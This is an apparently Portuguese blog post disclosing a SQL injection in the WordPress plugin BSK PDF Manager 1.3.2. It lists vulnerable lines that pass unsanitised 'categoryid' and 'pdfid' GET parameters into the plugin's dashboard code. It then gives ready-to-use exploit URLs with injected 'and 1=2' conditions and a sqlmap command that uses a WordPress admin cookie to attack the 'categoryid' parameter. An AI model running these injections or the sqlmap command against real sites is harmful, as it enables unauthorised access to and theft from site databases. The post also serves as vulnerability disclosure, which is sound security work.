terça-feira, 5 de agosto de 2014

WordPress BSK PDF Manager 1.3.2 SQL Injection

WordPress BSK PDF Manager 1.3.2 SQL Injection

0x WordPress BSK PDF Manager 1.3.2 SQL Injection

O plug-in ajuda a gerenciar seus documentos PDF em WordPress. Você pode enviar por categorias e exibição caregories ou mostrar um documento especial PDF.
É fácil de utilizar. Você só precisa copiar os códigos de acesso para a página / post onde você quer mostrar. Em seguida, ele irá mostrar o link na sua página / post.
Widget é suportado agora! Você pode mostrar a lista de PDFs em uma área de widget.
Código vulnerável

  1. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
  2. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $categories_curr_view = trim($_GET['view']);
  3. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['categoryid']) && $_GET['categoryid']){
  4. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $category_id = trim($_GET['categoryid']);
  5. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
  6. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $lists_curr_view = trim($_GET['view']);
  7. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['pdfid']) && $_GET['pdfid']){
  8. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $pdf_id = trim($_GET['pdfid']);
  9. $category_id = trim($_GET['categoryid']);
  10. $pdf_id = trim($_GET['pdfid']);

                                               0x Exploração via Browser e sqmlap

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2


sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid




Nenhum comentário:

Postar um comentário

............